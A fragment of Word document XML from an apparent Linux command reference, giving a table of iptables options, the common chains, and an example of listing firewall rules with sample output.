      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0D4A77CC" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="161B27E9"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 CHAIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AD6CB85" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Append rule to chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7414E5D0" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CE295B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I CHAIN [NUMBER]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B9667B2" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Insert rule at position (default 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0E1A9B3C" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60C147B5"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D CHAIN NUMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71E8E15D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Delete rule by number</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3345D845" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DC1F662"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D CHAIN RULE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0515E02D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Delete rule by specification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="53031E29" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19869234"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 CHAIN NUMBER RULE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AA3A523" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Replace rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="67B78322" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39A8DAB2"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L [CHAIN]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DDAA34D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>List rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="14F2C197" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="062E981B"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F [CHAIN]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="448DF4BD" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Flush (delete all) rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3AFCF5C0" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FF989E8"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Z [CHAIN]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="632C7121" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Zero packet and byte counters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="26500603" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="156C9CC5"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 CHAIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02C6F921" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Create new user-defined chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0D90A8DF" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67035C35"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X [CHAIN]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06F55A2A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Delete user-defined chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="44BAA9FC" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01AB1B8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P CHAIN TARGET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C4CADF7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set default policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="732736D1" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4817FD71"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E OLD-CHAIN NEW-CHAIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B62AA2C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Rename chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="55495E92" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="426EF22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lastRenderedPageBreak/>
              <w:t>-t TABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="354C9052" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Specify table (filter, nat, mangle, raw, security)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1DE13CC5" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ABDFD7F"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p PROTOCOL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65B2F801" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Match protocol (tcp, udp, icmp, all)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="72D03790" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64E51573"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 ADDRESS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4374CC58" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Source address/network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1D0DD092" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38F08939"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d ADDRESS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ECD178F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Destination address/network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6ECD7937" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36074230"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i INTERFACE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F82FA69" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Input interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="74B13228" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BB02279"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o INTERFACE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F276097" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Output interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4CF27340" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CDE164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port PORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F0A65DB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Source port(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0D164771" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C3C3F49"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dport PORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E548F9C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Destination port(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="758E4734" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ABF5F9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j TARGET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AC2FDC6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Jump to target (ACCEPT, DROP, REJECT, LOG, DNAT, SNAT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="237EA235" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E4E9185"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m MODULE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5731906E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Match extension module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1ED696E0" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C21815A"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v</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C6C3914" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Verbose output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7584C1D9" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2966C45A"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n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66877447" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Numeric output (don't resolve names)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1ABFAAF5" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="010D9DEB"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line-numbers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="026FEC0F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show rule numbers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="52E53970" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="460E3E1F"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x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B7216E6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Exact values (don't round)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0095E52B" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3ED96D42"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c PACKETS BYTES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36414236" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set packet and byte counters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7172F75A" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1185440B"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modprobe COMMAND</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40900DEC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Try to load missing modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62882D55" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Chains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3FF69D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>INPUT - Incoming packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E4AB9E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>OUTPUT - Outgoing packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1498AA49" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>FORWARD - Forwarded packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC97CD9" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC771DE" w14:textId="14CBA29C" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>List current rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11680DB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udo iptables -L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE3FF6C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CAC46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hain INPUT (policy ACCEPT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DE5C8C"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arget     prot opt source               destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E911D41"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ACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001C41E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ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5717DA2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DROP       all  --  anywhere             anywhere</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4918273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hain FORWARD (policy DROP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA446B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arget     prot opt source               destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F38972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hain OUTPUT (policy ACCEPT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790B2BAC"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arget     prot opt source               destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C975F65" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
